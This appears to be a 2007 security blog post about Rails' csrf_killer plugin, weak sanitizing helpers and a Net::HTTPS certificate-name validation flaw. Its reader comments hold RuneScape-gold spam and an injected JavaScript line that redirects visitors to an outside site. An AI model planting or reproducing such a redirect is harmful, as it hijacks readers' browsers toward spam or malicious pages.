Saturday
29Sep
Plugins merged and Ruby’s Net::HTTPS
Saturday, September 29, 2007 at 12:49PM Good news: The csrf_killer plugin has been merged by Rick for Rails 2.0, so it is available in the current trunk. Go here for the changeset, and here for some documentation.
Furthermore, the insecure text helper methods strip_links, strip_tags and sanitize have been updated, mostly to strip nested tags. Still, I don't recommend using them, as new tickets (same applies for strip_tags) are coming in for this fresh change.
And for those of you using the Ruby Net::HTTP and Net::HTTPS libraries, here is a security vulnerability in it (it's for Ruby, not Rails):
- A vulnerability results from the Net::HTTPS library failing to validate the name on the SSL certificate against the DNS name requested by the user. By not validating the name, the library allows an attacker to present a cryptographically valid certificate with an invalid CN.
View Printer Friendly Version
Email Article to Friend
Reader Comments (2)
Buy cheap RS gold,we are a professional, loyal and reliable and Runescape gold supplier online--24/7 non-stop service, cheap ,cheapest runescape money and with fast delivery.
24/7 Shop -Fast,Reliable,Cheap Runescape Money|Runescape Gold| - runescape money, runescape gold, runescape items, ..
RS gold site is selling RuneScape gold and RuneScape item,offering RuneScape money, RuneScape gold and RuneScape 2 Gold are collected ...
|
rutester
document.location='http://megasearchers.org/in.cgi?3';